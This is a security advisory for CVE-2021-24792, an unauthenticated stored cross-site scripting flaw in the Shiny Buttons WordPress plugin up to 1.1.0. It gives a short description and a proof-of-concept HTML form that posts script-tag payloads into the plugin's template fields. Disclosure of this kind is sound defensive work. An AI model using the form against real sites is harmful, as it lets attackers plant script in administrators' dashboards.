Shiny Buttons <= 1.1.0 – Unauthenticated Stored Cross-Site Scripting | CVE 2021-24792

Description

The plugin does not have any authorisation and CSRF in place when saving a template (wpbtn_save_template function hooked to the init action), nor sanitise and escape them before outputting them in the admin dashboard, which allow unauthenticated users to add a malicious template and lead to Stored Cross-Site Scripting issues.

Proof of Concept

<html>
  <body>
    <form action="https://example.com/" method="POST">
      <input type="hidden" name="wpbtn_tpl[id]" value="<script>alert(/XSS-id/)</script>" />
      <input type="hidden" name="wpbtn_tpl[name]" value="<script>alert(/XSS-name/)</script>" />
      <input type="hidden" name="wpbtn_tpl[bg_css]" value="background: #6d0019;background: -moz-linear-gradient(top, #6d0019 0%, #a90329 74%);background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#6d0019), color-stop(74%,#a90329));background: -webkit-linear-gradient(top, #6d0019 0%,#a90329 74%);background: -o-linear-gradient(top, #6d0019 0%,#a90329 74%);background: -ms-linear-gradient(top, #6d0019 0%,#a90329 74%);filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#6d0019', endColorstr='#a90329',GradientType=0 );background: linear-gradient(top, #6d0019 0%,#a90329 74%);" />
      <input type="hidden" name="wpbtn_tpl[text_color]" value="ffffff" />
      <input type="hidden" name="wpbtn_tpl[font]" value="Michroma" />
      <input type="hidden" name="wpbtn_tpl[font_size]" value="12" />
      <input type="hidden" name="wpbtn_tpl[font_weight]" value="normal" />
      <input type="hidden" name="wpbtn_tpl[border_color]" value="ffffff" />
      <input type="hidden" name="wpbtn_tpl[radius]" value="0" />
      <input type="hidden" name="wpbtn_tpl[width]" value="0" />
      <input type="hidden" name="do" value="Save Changes" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>